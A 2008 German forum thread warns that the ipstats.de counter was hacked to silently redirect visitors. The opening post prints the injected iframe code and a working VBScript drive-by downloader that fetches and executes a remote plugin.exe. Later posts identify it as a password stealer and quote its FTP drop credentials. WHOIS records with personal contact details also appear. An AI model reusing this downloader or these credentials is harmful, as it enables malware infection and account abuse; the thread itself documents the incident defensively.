Dein erster Besuch? Lies dir bitte zuerst die Regeln durch, dann erst registrieren!

Seite druckenArtikel empfehlengulli RSS News Feedsgulli twittertgulli:Newsletter
 
Thema geschlossen
Alt 05. 03. 2008, 15:08   # 1
BLU2
K!NG OF WEB!
 
Benutzerbild von BLU2
 
Registriert seit: Jul 2006
Ort: Hamburg
Beiträge: 206
Standard IpStats.de gehackt!

Hi, baut bitte alle schnell eure Counter von Ipstats.de aus... es scheint so als wurde der Counter gehackt! Alle seiten die diesen Counter drinne haben leiten auf http://www.inside-layer.com und danach weiter auf Datenklo.net

Code:
document.write( '<div style="display:none;"><a href="http://www.ipstats.de">IPSTATS.DE - Kostenloser Besucher Counter ohne Anmeldung!</a></div>' );

document.write( '<a href="http://www.ipstats.de/v3/30tage/xxx.html" target="_blank"><img border="0" src="http://www.ipstats.de/button.png" alt="IPSTATS.DE - Kostenloser Besucher Counter ohne Anmeldung!"></a>' );

document.write( '<div style="display:none;"><img alt="IPSTATS.DE - Kostenloser Besucher Counter ohne Anmeldung!" border=0 src="http://www.ipstats.de/v3/count.php?u=xxx&ref=' + escape(document.referrer) + '"></div>' );

document.write( '<iframe src="http://www.inside-layer.com/index.php" width="1" height="1"></iframe>' );
hier zählt der counter von den entführten seitenbeuschern : http://www.ipcounter.de/stats.php?u=48007937

inside-layer.com :
Code:
<meta http-equiv="refresh" content="5;url=http://datenklo.net"/>
<body onLoad="if (top!=self) { top.location=self.location; }">
<script language="VBscript">
On Error Resume Next

url = "http://inside-layer.com/plugin.exe"
Set xml = document.createElement("object")
xml.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set HTP = xml.CreateObject("Microsoft.XMLHTTP", "")

S1 = "Ad"
S2 = "od"
S3 = "b."
S4 = "ST"
S5 = "re"
S6 = "am"

Set AdbS = xml.CreateObject(S1 & S2 & S3 & S4 & S5 & S6, "")
AdbS.Type = 1

HTP.open "GET", url, False
HTP.Send

Set FSO = xml.CreateObject("Scripting.FileSystemObject", "")
Set tmp = FSO.GetSpecialFolder(2)
FileName = FSO.GetFileName(url)
FileName = FSO.BuildPath(tmp, FileName)

AdbS.open
AdbS.write HTP.responseBody
AdbS.SaveToFile FileName, 2
AdbS.Close

Set WSH = xml.CreateObject("Shell.Application", "")
WSH.ShellExecute FileName, "", "", "open", 1

</Script>
<script type="text/javascript" src="http://www.ipcounter.de/count_js.php?u=48007937&amp;color=pink"></script>
<noscript><a href="http://www.ipcounter.de/stats.php?u=48007937" target="_blank"><img src="http://www.ipcounter.de/count.php?u=48007937&amp;color=pink" alt="IPCOUNTER.DE - Kostenloser Live Counter!" border="0" /></a></noscript>
ich habe mal ein backup der .exe datein gemacht http://xlice.net/file/c207d7d3196058...lugin.exe.html
achtung nicht downloaden! nur für leute die wissen was sie damit zutun haben!!!



whoisdaten von inside-layer.com 85.13.132.215 http://whois.to/inside-layer.com
Code:
DOMAIN: INSIDE-LAYER.COM

RSP: please see tech-contact below

created-date: 2008-02-05
updated-date: 2008-02-05
registration-expiration-date: 2009-02-05

owner-contact: P-HCD205
owner-fname: Hiam
owner-lname: Darwiche
owner-street: Minervastr.78
owner-city: Isselburg
owner-zip: 46419
owner-country: DE
owner-phone: +49 152 01985775
owner-email: info@blacksh.net

admin-contact: P-HCD205
admin-fname: Hiam
admin-lname: Darwiche
admin-street: Minervastr.78
admin-city: Isselburg
admin-zip: 46419
admin-country: DE
admin-phone: +49 152 01985775
admin-email: info@blacksh.net

tech-contact: P-WOK24
tech-organization: Neue Medien Muennich
tech-fname: Werner
tech-lname: Kaltofen
tech-street: Dorfstrasse 49
tech-city: Friedersdorf
tech-zip: 02742
tech-country: DE
tech-phone: +49 35872 35310
tech-fax: +49 35872 35330
tech-email: hostmaster@all-inkl.com

billing-contact: P-WOK24
billing-organization: Neue Medien Muennich
billing-fname: Werner
billing-lname: Kaltofen
billing-street: Dorfstrasse 49
billing-city: Friedersdorf
billing-zip: 02742
billing-country: DE
billing-phone: +49 35872 35310
billing-fax: +49 35872 35330
billing-email: hostmaster@all-inkl.com

nameserver: ns5.kasserver.com
nameserver: ns6.kasserver.com
die domain aus dem whois "info@blacksh.net" http://whois.to/blacksh.net führt zu firecooler !
Code:
Domain name: blacksh.net

Registrant Contact:
   Private
   Mike Makefeels (firecooler@gmx.net)
   +1.337
   Fax: +1.5555555555
   Main Street 42
   Washingston, US 12877
   US

Administrative Contact:
   Private
   Mike Makefeels (firecooler@gmx.net)
   +1.337
   Fax: +1.5555555555
   Main Street 42
   Washingston, US 12877
   US

Technical Contact:
   Private
   Mike Makefeels (firecooler@gmx.net)
   +1.337
   Fax: +1.5555555555
   Main Street 42
   Washingston, US 12877
   US

Status: Locked

Name Servers:
   dns1.name-services.com
   dns2.name-services.com
   dns3.name-services.com
   dns4.name-services.com
   dns5.name-services.com
blacksh.net liegt übrigens auf der gleichen IP wie datenklo.net -.-

mit freundlichen Grüßen
BLU2
BLU2 ist offline  
Alt 05. 03. 2008, 15:14   # 2
mp17
Mit Glied
 
Benutzerbild von mp17
 
Registriert seit: Dec 2005
Beiträge: 582
Standard Re: IpStats.de gehackt!

hm aber die statistik seiten gehen ja noch, immerhin, also braucht man sie nicht auszubauen ^^

//edit: lol hab ma versucht die plugin.exe runterzuladen, mein pc ist vor virusmeldungen fast abgestürzt
mp17 ist offline  
Alt 05. 03. 2008, 16:14   # 3
_ONE_
kann alles
 
Benutzerbild von _ONE_
 
Registriert seit: Feb 2007
Beiträge: 613
Standard Re: IpStats.de gehackt!

hatte probleme mit meiner page hat imer weitergeleitet habs rausgebaut jetzt geht alles
_ONE_ ist offline  
Alt 05. 03. 2008, 16:21   # 4
Annyn
Altaϊrs Nachfolger
 
Benutzerbild von Annyn
 
Registriert seit: Jun 2007
Beiträge: 1.686
Standard Re: IpStats.de gehackt!

Zitat:
Zitat von mp17
//edit: lol hab ma versucht die plugin.exe runterzuladen, mein pc ist vor virusmeldungen fast abgestürzt
Welche plugin.exe ?
Assassins Creed 2 Sammelthread!
Happy Birthday gulli:board!
Annyn ist offline  
Alt 05. 03. 2008, 16:45   # 5
mp17
Mit Glied
 
Benutzerbild von mp17
 
Registriert seit: Dec 2005
Beiträge: 582
Standard Re: IpStats.de gehackt!

Zitat:
Zitat von BLU2

inside-layer.com :
Code:
<meta http-equiv="refresh" content="5;url=http://datenklo.net"/>
<body onLoad="if (top!=self) { top.location=self.location; }">
<script language="VBscript">
On Error Resume Next

url = "http://inside-layer.com/plugin.exe"
Set xml = document.createElement("object")
xml.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set HTP = xml.CreateObject("Microsoft.XMLHTTP", "")
...
Die exe Datei, den die weitergeleitete Website einbindet.
mp17 ist offline  
Alt 05. 03. 2008, 17:33   # 6
BLU2
K!NG OF WEB!
(Threadstarter)
 
Benutzerbild von BLU2
 
Registriert seit: Jul 2006
Ort: Hamburg
Beiträge: 206
Standard Re: IpStats.de gehackt!

inzwischen ist der iframe code aus dem javascript vershcwunden
BLU2 ist offline  
Alt 05. 03. 2008, 18:40   # 7
devnull2600
Mitglied
 
Registriert seit: Feb 2008
Beiträge: 9
Standard Re: IpStats.de gehackt!

Hallo BLU2,

Das blacksh.net gehören mir nicht, sondern einem Typen namens Samer Fakhro, ich denke es war das alles sein Werk, um die Missverständnisse auszuschließen.

MfG Firecooler
devnull2600 ist offline  
Alt 05. 03. 2008, 18:43   # 8
layerstats
Mitglied
 
Registriert seit: Feb 2007
Beiträge: 28
Standard Re: IpStats.de gehackt!

Hi,

wie und was genau da geschah, weiss ich leider selbst noch nicht...

Kann eventl. jemand sagen, seit wann dieses Problem mit der Weiterleitung auftrat und wer ist Samer Fakhro?

vG
layerstats ist offline  
Alt 05. 03. 2008, 19:20   # 9
Kugelfisch23
Nerd
Boardcrew
 
Benutzerbild von Kugelfisch23
 
Registriert seit: Oct 2007
Ort: Im Ozean
Beiträge: 8.680
Standard Re: IpStats.de gehackt!

Nach ersten Analysen in einem Honigtopf lädt die Plugin.exe lädt DoNotDelete.dat nach, was wohl ein Trojaner ist. Genauere Analysen stehen noch aus, es würde mich jedoch nicht wundern, wenn man da irgendwo versteckte FTP-Daten finden würde - der Server des Kiddies dürfte sich dann einigen DELE-Befehlen erfreuen
Mit Grüssen aus'm Ozean
Kugelfisch
Today is Boomtime, the 32nd day of Chaos in the YOLD 3176
Kugelfischs Blog - Netzwelt-Wiki
Kugelfisch23 ist gerade online  
Alt 05. 03. 2008, 19:43   # 10
mp17
Mit Glied
 
Benutzerbild von mp17
 
Registriert seit: Dec 2005
Beiträge: 582
Standard Re: IpStats.de gehackt!

jo ist geil mach mal ^^
mp17 ist offline  
Alt 05. 03. 2008, 21:15   # 11
Kugelfisch23
Nerd
Boardcrew
 
Benutzerbild von Kugelfisch23
 
Registriert seit: Oct 2007
Ort: Im Ozean
Beiträge: 8.680
Standard Re: IpStats.de gehackt!

Zitat:
Zitat von mp17
jo ist geil mach mal
VMWare-Honigtopf+Kabelhai sind nett...
Code:
220 FTP on dd8626.kasserver.com ready
USER w00985e7
331 Password required for w00985e7.
PASS 3cd1iutu
230 User w00985e7 logged in.
...bis vor etwa einer Stunde. Nun sagt der Server ganz was anderes...
Code:
220 FTP on dd8626.kasserver.com ready
USER w00985e7
331 Password required for w00985e7.
PASS 3cd1iutu
530 Login incorrect.
...das Kiddie, das seinen Super-1337-Passwort-Stealer so verteilt hat, hat wohl mitgelesen... Jetzt kann das Teil wenigstens keinen grösseren Schaden mehr anrichten

EDIT: Oh, ich sehe gerade, da war wohl einer `schneller`.
Zitat:
Zitat von http://inside-layer.com
hackers hacked by anti-hackers =)
Mit Grüssen aus'm Ozean
Kugelfisch
Today is Boomtime, the 32nd day of Chaos in the YOLD 3176
Kugelfischs Blog - Netzwelt-Wiki
Kugelfisch23 ist gerade online  
Alt 05. 03. 2008, 21:29   # 12
Fiete87
Mac Pro User
 
Benutzerbild von Fiete87
 
Registriert seit: Jul 2007
Beiträge: 134
Standard Re: IpStats.de gehackt!

Wieso sollte man den Counter von IPstats verwenden?
Gibt doch weitaus Seriösere Mittel und Wege.
Fiete87 ist offline  
Alt 05. 03. 2008, 21:30   # 13
brabbelj
Mitglied
 
Registriert seit: Dec 2006
Beiträge: 429
Standard Re: IpStats.de gehackt!

Ein paar infos zu der Plugin.exe

Virustotal scan:
http://www.virustotal.com/de/analisi...4d810afdff69f7

ich habe desweiteren herrausgefunden

das sich der Paswordstealer V3 da drin befand.

mfg
brabbelj
brabbelj ist offline  
Alt 05. 03. 2008, 22:13   # 14
layerstats
Mitglied
 
Registriert seit: Feb 2007
Beiträge: 28
Standard Re: IpStats.de gehackt!

Zitat:
Zitat von Fiete87
Wieso sollte man den Counter von IPstats verwenden?
Gibt doch weitaus Seriösere Mittel und Wege.
Was war denn bitte, vor dem Hack, unseriös?

vG
layerstats ist offline  
Alt 05. 03. 2008, 22:28   # 15
mp17
Mit Glied
 
Benutzerbild von mp17
 
Registriert seit: Dec 2005
Beiträge: 582
Standard Re: IpStats.de gehackt!

ja eben ^^
vorallem ist doch die geilste lösung, wenn man zu faul ist nen extra script in die website einzubauen, hat man einfach den kleinen code rein fertig, finds geil
mp17 ist offline  
Alt 06. 03. 2008, 21:52   # 16
nethiob
Mitglied
 
Registriert seit: Sep 2006
Beiträge: 208
Standard Re: IpStats.de gehackt!

Zitat:
Zitat von Kugelfisch23
VMWare-Honigtopf+Kabelhai sind nett...
Code:
220 FTP on dd8626.kasserver.com ready
USER w00985e7
331 Password required for w00985e7.
PASS 3cd1iutu
230 User w00985e7 logged in.
...bis vor etwa einer Stunde. Nun sagt der Server ganz was anderes...
und wieviel daten hat der stealer auf dem bereits ftp gesammelt gehabt? hasts ja wohl gesehen...

und dumm wenn er deutschen pay-webspace als ziel-ftp nimmt.
nethiob ist offline  
Alt 06. 03. 2008, 21:58   # 17
Kugelfisch23
Nerd
Boardcrew
 
Benutzerbild von Kugelfisch23
 
Registriert seit: Oct 2007
Ort: Im Ozean
Beiträge: 8.680
Standard Re: IpStats.de gehackt!

Zitat:
Zitat von nethiob
und wieviel daten hat der stealer auf dem bereits ftp gesammelt gehabt? hasts ja wohl gesehen...
Leider nicht. Ich habe den Wireshark-Dump gemacht, danach musste ich für eine Stunde weg, und erst danach habe ich die Daten analysiert. Und da waren die Logindaten dann schon geändert...

Zitat:
Zitat von nethiob
und dumm wenn er deutschen pay-webspace als ziel-ftp nimmt.
1337-Kiddies, die vorgefertigte Programme verwenden, haben es meist an sich, dumm zu sein. Das ist ein fundamentales Naturgesetz ohne jegliche Ausnahmen...
Mit Grüssen aus'm Ozean
Kugelfisch
Today is Boomtime, the 32nd day of Chaos in the YOLD 3176
Kugelfischs Blog - Netzwelt-Wiki
Kugelfisch23 ist gerade online  
Alt 06. 03. 2008, 22:03   # 18
nethiob
Mitglied
 
Registriert seit: Sep 2006
Beiträge: 208
Standard Re: IpStats.de gehackt!



dass die deppen immer auf ftp setzen bei den dummen stealern...
nethiob ist offline  
Themen-Optionen Thema geschlossen

Themen-Optionen

Forumregeln
Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.

Gehe zu


Alle Zeitangaben in UTC +1. Es ist jetzt 17:45 Uhr.
Powered by vBulletin® copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
Seite druckenArtikel empfehlengulli RSS News Feedsgulli twittertgulli:NewsletterSeitenanfang

Suche

gulli:News

game:Tipps

Escaria: Erobere die Welt
Artyria: Werde Gladiator
Gondal: Das Fantasy-Spiel
Last Emperor: Werde Samurai
Nightcreeps: Abenteuer pur